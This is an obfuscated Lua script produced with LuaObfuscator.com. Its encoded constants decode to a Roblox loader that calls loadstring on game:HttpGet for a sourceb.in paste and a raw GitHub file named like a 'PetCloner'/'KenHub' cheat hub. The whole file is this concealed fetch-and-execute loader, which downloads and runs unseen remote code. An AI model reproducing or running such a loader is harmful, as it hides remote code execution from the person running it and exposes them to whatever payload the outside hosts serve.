--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v85=v2(v0(v30,16));if v19 then local v110=0;local v111;while true do if (v110==1) then return v111;end if (v110==0) then v111=v5(v85,v19);v19=nil;v110=1;end end else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/(((5 + 0) -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + (105 -31))))) ;return v86-(v86%1) ;else local v87=568 -(367 + 201) ;local v88;while true do if (v87==(927 -((1279 -(68 + 997)) + 713))) then v88=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v88 + v88))>=v88) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=1270 -(51 + 175 + 1044) ;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1 + 0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (959 -(892 + 65)) ;return (v37 * 256) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -((213 -126) + 263)) ;return (v41 * (16777396 -(67 + 113))) + (v40 * 65536) + (v39 * (188 + 68)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 + (18 -(10 + 8)) ;local v45=(v20(v43,1,79 -59 ) * ((954 -((3084 -2282) + 150))^(85 -(495 -(416 + 26))))) + v42 ;local v46=v20(v43,21,55 -24 );local v47=((v20(v43,(76 -52) + 8 )==(998 -(915 + 36 + 46))) and  -1) or 1 ;if (v46==(0 -0)) then if (v45==((0 -0) + 0)) then return v47 * (0 -0) ;else v46=1;v44=(1625 -(145 + 293)) -(1069 + 118) ;end elseif (v46==(4643 -2596)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-((1445 -(44 + 386)) + 8) ) * (v44 + (v45/((793 -(368 + 423))^(163 -111)))) ;end local function v25(v48) local v49=1486 -(998 + 488) ;local v50;local v51;while true do if (v49==((2 -1) + 2)) then return v6(v51);end if (v49==0) then v50=nil;if  not v48 then local v118=0 + 0 ;while true do if (v118==(772 -(11 + 190 + 571))) then v48=v23();if (v48==(1138 -(116 + 1022))) then return "";end break;end end end v49=4 -3 ;end if (v49==(2 + 0)) then v51={};for v112=1 + 0 , #v50 do v51[v112]=v2(v1(v3(v50,v112,v112)));end v49=(895 -(261 + 624)) -7 ;end if (v49==1) then v50=v3(v16,v18,(v18 + v48) -(3 -(3 -1)) );v18=v18 + v48 ;v49=861 -(814 + 45) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v89,v90,v91,v92,v93,v94,v95,v96) local v89=(function() return 0;end)();local v90=(function() return;end)();local v92=(function() return;end)();while true do if (v89~=0) then else local v119=(function() return 0 -0 ;end)();local v120=(function() return;end)();while true do if (v119~=0) then else v120=(function() return 0 + 0 ;end)();while true do if (v120==1) then v89=(function() return  #"!";end)();break;end if (v120~=(574 -(507 + 67))) then else v90=(function() return v91();end)();v92=(function() return nil;end)();v120=(function() return 1750 -(1013 + 736) ;end)();end end break;end end end if (v89~= #">") then else if (v90== #"|") then v92=(function() return v91()~=(0 + 0) ;end)();elseif (v90==(1 + 1)) then v92=(function() return v93();end)();elseif (v90== #"asd") then v92=(function() return v94();end)();end v95[v96]=(function() return v92;end)();break;end end return v89,v90,v91,v92,v93,v94,v95,v96;end;end)();local v53=(function() return function(v97,v98,v99) local v100=(function() return 0 -0 ;end)();local v101=(function() return;end)();while true do if (v100==0) then v101=(function() return 0;end)();while true do if (v101==0) then local v125=(function() return 0 -0 ;end)();while true do if (v125==(867 -(550 + 317))) then v97[v98-#"[" ]=(function() return v99();end)();return v97,v98,v99;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #"<",v58 do FlatIdent_25011,Type,v21,Cons,v24,v25,v59,v67=(function() return v52(FlatIdent_25011,Type,v21,Cons,v24,v25,v59,v67);end)();end v57[ #"xnx"]=(function() return v21();end)();for v68= #"}",v23() do local v69=(function() return v21();end)();if (v20(v69, #"}", #"{")==0) then local v105=(function() return 0 -0 ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if ((0 -0)==v105) then local v122=(function() return 0;end)();while true do if (v122~=(1 -0)) then else v105=(function() return 2 -1 ;end)();break;end if (v122==(285 -(134 + 151))) then v106=(function() return 0;end)();v107=(function() return nil;end)();v122=(function() return 2 -1 ;end)();end end end if (v105~=2) then else while true do if (v106== #"-19") then if (v20(v108, #"xxx", #"xnx")~= #"{") then else v109[ #"0836"]=(function() return v59[v109[ #"?id="]];end)();end v54[v68]=(function() return v109;end)();break;end if ( #">"==v106) then local v129=(function() return 0;end)();local v130=(function() return;end)();while true do if (v129~=(1665 -(970 + 695))) then else v130=(function() return 603 -(268 + 335) ;end)();while true do if ((1 -0)~=v130) then else v106=(function() return 292 -(60 + 230) ;end)();break;end if ((1990 -(582 + 1408))~=v130) then else v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==0) then local v199=(function() return 0 -0 ;end)();local v200=(function() return;end)();while true do if (v199~=(0 -0)) then else v200=(function() return 0 + 0 ;end)();while true do if ((0 -0)==v200) then v109[ #"gha"]=(function() return v22();end)();v109[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v107== #"|") then v109[ #"gha"]=(function() return v23();end)();elseif (v107==2) then v109[ #"xxx"]=(function() return v23() -((813 -(569 + 242))^(1840 -(1195 + 629))) ;end)();elseif (v107== #"-19") then local v209=(function() return 0;end)();local v210=(function() return;end)();while true do if (v209~=(0 -0)) then else v210=(function() return 241 -(187 + 54) ;end)();while true do if (v210==(1251 -(721 + 530))) then v109[ #"xxx"]=(function() return v23() -((1273 -(945 + 326))^(796 -(162 + 618))) ;end)();v109[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v130=(function() return 2 -1 ;end)();end end break;end end end if (v106==(0 + 0)) then local v131=(function() return 0;end)();local v132=(function() return;end)();while true do if (v131==0) then v132=(function() return 0 + 0 ;end)();while true do if (v132~=(701 -(271 + 429))) then else v106=(function() return  #"<";end)();break;end if (v132==(0 + 0)) then v107=(function() return v20(v69,3 -1 , #"-19");end)();v108=(function() return v20(v69, #"asd1",9 -3 );end)();v132=(function() return 1 + 0 ;end)();end end break;end end end if (v106==(1088 -(461 + 625))) then local v133=(function() return 1288 -(993 + 295) ;end)();local v134=(function() return;end)();while true do if ((1636 -(1373 + 263))~=v133) then else v134=(function() return 0;end)();while true do if (v134==(1000 -(451 + 549))) then if (v20(v108, #" ", #"]")== #"}") then v109[1 + 1 ]=(function() return v59[v109[1 + 1 ]];end)();end if (v20(v108,2,2 -0 )== #"/") then v109[ #"91("]=(function() return v59[v109[ #"xnx"]];end)();end v134=(function() return 1 + 0 ;end)();end if (v134~=(1 -0)) then else v106=(function() return  #"-19";end)();break;end end break;end end end end break;end if (v105~=1) then else local v123=(function() return 1384 -(746 + 638) ;end)();local v124=(function() return;end)();while true do if ((0 + 0)~=v123) then else v124=(function() return 0;end)();while true do if ((1 + 0)==v124) then v105=(function() return 2 -0 ;end)();break;end if (v124==(341 -(218 + 123))) then v108=(function() return nil;end)();v109=(function() return nil;end)();v124=(function() return 1 + 0 ;end)();end end break;end end end end end end for v70= #" ",v23() do v55,v70,v28=(function() return v53(v55,v70,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1323 -(1249 + (236 -(92 + 71))) ];local v65=v61[1 + 1 ];local v66=v61[1148 -(231 + 235 + 679) ];return function(...) local v71=v64;local v72=v65;local v73=v66;local v74=v27;local v75=217 -(42 + 174) ;local v76= -(2 -1);local v77={};local v78={...};local v79=v12("#",...) -(1901 -(106 + 1794)) ;local v80={};local v81={};for v102=0 + 0 ,v79 do if (v102>=v73) then v77[v102-v73 ]=v78[v102 + 1 + 0 ];else v81[v102]=v78[v102 + 1 ];end end local v82=(v79-v73) + ((2270 -(574 + 191)) -(363 + 1141)) ;local v83;local v84;while true do v83=v71[v75];v84=v83[(1305 + 276) -(1183 + 397) ];if ((3058<4860) and (v84<=(14 -9))) then if (v84<=(5 -3)) then if (v84<=(114 -(4 + 110))) then if (v81[v83[586 -(57 + 527) ]]==v83[1431 -(41 + 1386) ]) then v75=v75 + (104 -(17 + 86)) ;else v75=v83[3 + 0 ];end elseif (v84>(1 -0)) then local v138=(0 -0) -0 ;local v139;local v140;local v141;local v142;while true do if (v138==((85 + 81) -(122 + 44))) then v139=v83[2 -0 ];v140,v141=v74(v81[v139](v13(v81,v139 + 1 ,v83[(858 -(254 + 595)) -6 ])));v138=1 + 0 ;end if (((1 + 1)==v138) or (1296>=4446)) then for v194=v139,v76 do local v195=(126 -(55 + 71)) -(0 -0) ;while true do if ((65 -(30 + 35))==v195) then v142=v142 + 1 + 0 ;v81[v194]=v140[v142];break;end end end break;end if (v138==1) then v76=(v141 + v139) -(1258 -(1043 + 214)) ;v142=476 -(41 + 435) ;v138=7 -5 ;end end else v75=v83[(1793 -(573 + 1217)) + 0 ];end elseif ((v84<=(1215 -(323 + 889))) or (1393>4489)) then local v126=0;local v127;while true do if (v126==(0 -0)) then v127=v83[582 -(361 + 219) ];v81[v127]=v81[v127](v13(v81,v127 + (321 -(53 + 267)) ,v76));break;end end elseif ((v84==(1 + (8 -5))) or (4424<27)) then v81[v83[415 -(15 + 398) ]]=v83[985 -(18 + 964) ];else v81[v83[1140 -(782 + 356) ]]=v63[v83[11 -8 ]];end elseif (v84<=(20 -(1 + 11))) then if (v84<=(4 + 2)) then for v135=v83[2 -(0 -0) ],v83[(941 -(714 + 225)) + 1 ] do v81[v135]=nil;end elseif (v84>(1882 -(157 + 1718))) then v81[v83[2 + 0 ]]=v83[(2492 -1639) -(20 + 830) ]~=(0 + 0) ;else v81[v83[128 -(116 + 10) ]]();end elseif ((v84<=(1 + 8)) or (1997>3815)) then do return;end elseif ((3465>1913) and (v84==(748 -(542 + 196)))) then local v149=0 -0 ;local v150;local v151;local v152;local v153;local v154;while true do if ((733<1819) and (v149==(0 -0))) then v150=nil;v151,v152=nil;v153=nil;v154=nil;v149=1 + 0 ;end if ((v149==((3 -0) + 1)) or (4395==4755)) then v81[v83[1 + 1 ]]=v83[2 + (1 -0) ]~=((806 -(118 + 688)) -0) ;v75=v75 + (2 -1) ;v83=v71[v75];v154=v83[4 -2 ];v149=1556 -(1126 + 425) ;end if (v149==(413 -(118 + 287))) then v83=v71[v75];v81[v83[2]]=v63[v83[11 -8 ]];v75=v75 + (1122 -(118 + (1051 -(25 + 23)))) ;v83=v71[v75];v149=26 -17 ;end if (v149==(382 -(142 + 235))) then v151,v152=v74(v81[v154](v13(v81,v154 + (1899 -(260 + 1638)) ,v83[13 -10 ])));v76=(v152 + v154) -(1 + 0 + 0) ;v150=0 -0 ;for v196=v154,v76 do v150=v150 + (978 -(553 + 424)) ;v81[v196]=v151[v150];end v149=10 -4 ;end if ((v149==(20 -13)) or (3793<2369)) then v75=v75 + (1887 -(927 + 959)) + 0 ;v83=v71[v75];v81[v83[(6 -4) + 0 ]]();v75=v75 + 1 + 0 ;v149=4 + 4 ;end if (v149==(1 + 0)) then v81[v83[(736 -(16 + 716)) -2 ]]=v63[v83[7 -4 ]];v75=v75 + (684 -(483 + 200)) ;v83=v71[v75];v154=v83[3 -1 ];v149=1465 -(1404 + (156 -(11 + 86))) ;end if (v149==(4 -2)) then v153=v81[v83[8 -5 ]];v81[v154 + 1 + 0 ]=v153;v81[v154]=v153[v83[769 -(468 + 297) ]];v75=v75 + (4 -3) ;v149=3;end if ((v149==(10 -7)) or (4084==265)) then v83=v71[v75];v81[v83[2]]=v83[3];v75=v75 + (754 -(239 + 514)) ;v83=v71[v75];v149=2 + 2 ;end if (v149==(1338 -(797 + 532))) then v81[v83[2 + 0 ]]=v63[v83[2 + 1 ]];v75=v75 + (2 -1) ;v83=v71[v75];v154=v83[1204 -(373 + 829) ];v149=741 -(476 + 255) ;end if (v149==(242 -(141 + 95))) then v75=v75 + (1131 -(369 + 761)) ;v83=v71[v75];v154=v83[2 + 0 ];v81[v154]=v81[v154](v13(v81,v154 + (1 -0) ,v76));v149=16 -9 ;end if (v149==10) then v153=v81[v83[3]];v81[v154 + (2 -1) + 0 ]=v153;v81[v154]=v153[v83[7 -3 ]];break;end end else local v155=v83[2 + 0 ];local v156=v81[v83[2 + 1 ]];v81[v155 + (1 -0) ]=v156;v81[v155]=v156[v83[242 -(64 + 174) ]];end v75=v75 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q7470733A2Q2F63646E2E736F75726365622E696E2F62696E732F5751365A324F702Q33312F30034E3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B656E5363726970742Q732F506574436C6F6E65722F726566732F68656164732F6D61696E2F4B656E487562001B3Q0012043Q00014Q0006000100013Q00264Q0002000100010004013Q00020001001204000100013Q00262Q00010005000100010004013Q00050001001205000200023Q00120A000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q000300030004001204000500064Q0002000300054Q000300023Q00022Q00070002000100010004013Q001A00010004013Q000500010004013Q001A00010004013Q000200012Q00093Q00017Q00",v9(),...);
